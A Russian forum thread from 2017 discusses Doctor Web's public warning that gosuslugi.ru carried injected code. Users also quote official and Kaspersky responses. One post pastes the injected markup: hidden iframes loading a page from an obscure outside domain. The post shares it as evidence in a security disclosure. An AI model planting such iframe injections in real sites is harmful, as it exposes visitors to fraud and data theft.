Форум на Kuban.ru (http://forums.kuban.ru/)
-   Общественная жизнь (http://forums.kuban.ru/f1476/)
-   -   Портал "Госуслуги" готов красть данные в любой момент (http://forums.kuban.ru/f1476/portal_gosuslugi_gotov_krast-_dannye_v_lyuboj_moment-8397121.html)

fatimkat00 14.07.2017 14:21
Портал "Госуслуги" готов красть данные в любой момент
 
На портале государственных услуг Российской Федерации (gosuslugi.ru) специалисты компании «Доктор Веб» обнаружили внедрённый неизвестными потенциально вредоносный код. В связи с отсутствием реакции со стороны администрации сайта gosuslugi.ru мы вынуждены прибегнуть к публичному информированию об угрозе.

Дату начала компрометации, а также прошлую активность по этому вектору атаки, установить на данный момент не представляется возможным. Вредоносный код заставляет браузер любого посетителя сайта незаметно связываться с одним из не менее 15 доменных адресов, зарегистрированных на неизвестное частное лицо. В ответ с этих доменов может поступить любой независимый документ, начиная от фальшивой формы ввода данных кредитной карточки и заканчивая перебором набора уязвимостей с целью получить доступ к компьютеру посетителя сайта.

В процессе динамического генерирования страницы сайта, к которой обращается пользователь, в код сайта добавляется контейнер <iframe>, позволяющий загрузить или запросить любые сторонние данные у браузера пользователя. На текущий момент специалистами обнаружено не менее 15 доменов, среди которых: m3oxem1nip48.ru, m81jmqmn.ru и другие адреса намеренно неинформативных наименований. Как минимум для 5 из них диапазон адресов принадлежит компаниям, зарегистрированным в Нидерландах. За последние сутки запросы к этим доменам либо не завершаются успехом, так как сертификат безопасности большинства этих сайтов просрочен либо не содержит вредоносного кода, однако ничего не мешает владельцам доменов в любой момент обновить сертификаты и разместить на этих доменах вредоносный программный код.

На данный момент сайт gosuslugi.ru по-прежнему скомпрометирован, информация передана в техническую поддержку сайта, но подтверждения принятия необходимых мер по предотвращению инцидентов в будущем и расследования в прошлом не получено. «Доктор Веб» рекомендует проявлять осторожность при использовании портала государственных услуг Российской Федерации до разрешения ситуации. ООО «Доктор Веб» рекомендует администрации сайта gosuslugi.ru и компетентным органам осуществить проверку безопасности сайта.

Любой пользователь может проверить наличие кода самостоятельно, использовав поисковый сервис и задав запрос о поиске следующей формулировки:site:gosuslugi.ru «A1996667054»

ahtunhe4 14.07.2017 14:41
Дебил, ты им сам те данные предоставляешь

fatimkat00 14.07.2017 14:52
[quote=ахтег;44502212] Дебил, ты им сам те данные предоставляешь [/quote]

Краденые?

Winny 14.07.2017 15:41
[em]Минкомсвязи России сообщило об устранении вредоносного кода, обнаруженного на едином портале госуслуг (ЕПГУ; gosuslugi.ru). «Оперативно проведены мероприятия по устранению потенциальной возможности нарушения конфиденциальности пользовательских данных портала ЕПГУ,— приводит ТАСС слова представителя ведомства.— Многочисленные защитные механизмы сайта госуслуг сделали реализацию потенциальной угрозы практически невозможной».[/em]
Тему в корзину.

fatimkat00 14.07.2017 15:42
[quote=Winny;44502519]Тему в корзину. [/quote]
site:gosuslugi.ru «A1996667054»
Работает до сих пор, официальная новость на Вебе висит:
[url]https://news.drweb.ru/show/?c=5&i=11373&lng=ru[/url]

fatimkat00 14.07.2017 15:43
Предоставление муниципальной услуги - Госуслуги
[url]https://www.gosuslugi.ru/194564/3/[/url]
<br> <iframe id="a1996667054" src="https://m3oxem1nip48.ru/f.html" ></iframe><iframe id="a1996667054" src="https://m3oxem1nip48.ru/f.html" ></iframe> ...

RKa 15.07.2017 17:04
Руководитель российского исследовательского центра «Лаборатория Касперского» Юрий Наместников рассказал РБК о вирусе на российском портале госуслуг.

«На сайте gosuslugi.ru сейчас есть код, который осуществляет переход по внешней ссылке. В данный момент этот код, по сути, накручивает клики на сайты, так как сам пользователь новую страницу не видит, а его браузер туда заходит», — заявил Наместников. По его словам, это adware (рекламное программное обеспечение) распространяется в интернете с 2015 года. Он уточнил, что этот код присутствует на нескольких десятках сайтах в русскоговорящем сегменте интернета."

RKa 15.07.2017 17:06
Вот зачем государственному порталу накручиватели кликов? Похоже что кто то из админов получает бабло когда браузеры пользователей кликают незаметно по другим сайтам

Все это дико запутанно - не то сбор кликов на чужих сайтах не то сбор денег с ваших карточек )


Текущее время: 00:00. Часовой пояс GMT +3.